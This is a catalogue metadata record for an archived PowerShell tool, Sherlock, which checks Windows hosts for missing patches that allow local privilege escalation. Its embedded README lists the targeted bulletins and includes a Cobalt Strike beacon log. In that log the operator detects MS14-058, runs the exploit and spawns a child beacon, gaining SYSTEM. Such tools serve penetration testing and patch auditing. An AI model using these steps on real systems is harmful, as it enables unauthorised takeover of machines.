{"id":13534863,"url":"https://github.com/rasta-mouse/Sherlock","last_synced_at":"2025-04-02T00:30:47.422Z","repository":{"id":41092744,"uuid":"86997630","full_name":"rasta-mouse/Sherlock","owner":"rasta-mouse","description":"PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.","archived":true,"fork":false,"pushed_at":"2018-10-10T09:10:45.000Z","size":32,"stargazers_count":1837,"open_issues_count":3,"forks_count":424,"subscribers_count":80,"default_branch":"master","last_synced_at":"2024-05-02T02:23:16.617Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rasta-mouse.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-04-02T16:01:53.000Z","updated_at":"2024-04-29T15:11:46.000Z","dependencies_parsed_at":"2022-07-14T08:17:12.751Z","dependency_job_id":null,"html_url":"https://github.com/rasta-mouse/Sherlock","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rasta-mouse%2FSherlock","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rasta-mouse%2FSherlock/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rasta-mouse%2FSherlock/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rasta-mouse%2FSherlock/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rasta-mouse","download_url":"https://codeload.github.com/rasta-mouse/Sherlock/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222784453,"owners_count":17037192,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T08:00:44.274Z","updated_at":"2024-11-02T22:30:57.063Z","avatar_url":"https://github.com/rasta-mouse.png","language":"PowerShell","funding_links":[],"categories":["Privilege Escalation","Windows Payload","PowerShell","Privilige Escalation","PowerShell (153)","Pentest Methodology","web shell、shellcode","Programming/Comp Sci/SE Things"],"sub_categories":["Windows","List of Windows post exploitation","Standard Scripts for Enumeration","Privilege Escalation","网络服务_其他","🪟 Windows Privilege Escalation","Windows Privesc","Windows Privilege Escalation"],"readme":"\u003e Deprecated.  Have a look at [Watson](https://github.com/rasta-mouse/Watson) instead.\n\n# Sherlock\n\nPowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.\n\n## Currently looks for:\n\n* MS10-015 : User Mode to Ring (KiTrap0D)\n* MS10-092 : Task Scheduler\n* MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow\n* MS13-081 : TrackPopupMenuEx Win32k NULL Page\n* MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference\n* MS15-051 : ClientCopyImage Win32k\n* MS15-078 : Font Driver Buffer Overflow\n* MS16-016 : 'mrxdav.sys' WebDAV\n* MS16-032 : Secondary Logon Handle\n* MS16-034 : Windows Kernel-Mode Drivers EoP\n* MS16-135 : Win32k Elevation of Privilege\n* CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc\n\n## Basic Usage:\n\n```\nbeacon\u003e getuid\n[*] Tasked beacon to get userid\n[+] host called home, sent: 20 bytes\n[*] You are Win7-x64\\Rasta\n\nbeacon\u003e powershell-import C:\\Users\\Rasta\\Desktop\\Sherlock.ps1\n[*] Tasked beacon to import: C:\\Users\\Rasta\\Desktop\\Sherlock.ps1\n[+] host called home, sent: 2960 bytes\n\nbeacon\u003e powershell Find-MS14058\n[*] Tasked beacon to run: Find-MS14058\n[+] host called home, sent: 20 bytes\n[+] received output:\n\nTitle      : TrackPopupMenu Win32k Null Pointer Dereference\nMSBulletin : MS14-058\nCVEID      : 2014-4113\nLink       : https://www.exploit-db.com/exploits/35101/\nVulnStatus : Appears Vulnerable\n\nbeacon\u003e elevate ms14-058 smb\n[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)\n[+] host called home, sent: 105015 bytes\n[+] received output:\n[*] Getting Windows version...\n[*] Solving symbols...\n[*] Requesting Kernel loaded modules...\n[*] pZwQuerySystemInformation required length 51216\n[*] Parsing SYSTEM_INFO...\n[*] 173 Kernel modules found\n[*] Checking module \\SystemRoot\\system32\\ntoskrnl.exe\n[*] Good! nt found as ntoskrnl.exe at 0x0264f000\n[*] ntoskrnl.exe loaded in userspace at: 40000000\n[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC\n[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0\n[*] Registering class...\n[*] Creating window...\n[*] Allocating null page...\n[*] Getting PtiCurrent...\n[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0\n[*] Creating a fake structure at NULL...\n[*] Triggering vulnerability...\n[!] Executing payload...\n\n[+] host called home, sent: 204885 bytes\n[+] established link to child beacon: 192.168.56.105\n\nbeacon\u003e getuid\n[*] Tasked beacon to get userid\n[+] host called home, sent: 8 bytes\n[*] You are NT AUTHORITY\\SYSTEM (admin)\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frasta-mouse%2FSherlock","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frasta-mouse%2FSherlock","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frasta-mouse%2FSherlock/lists"}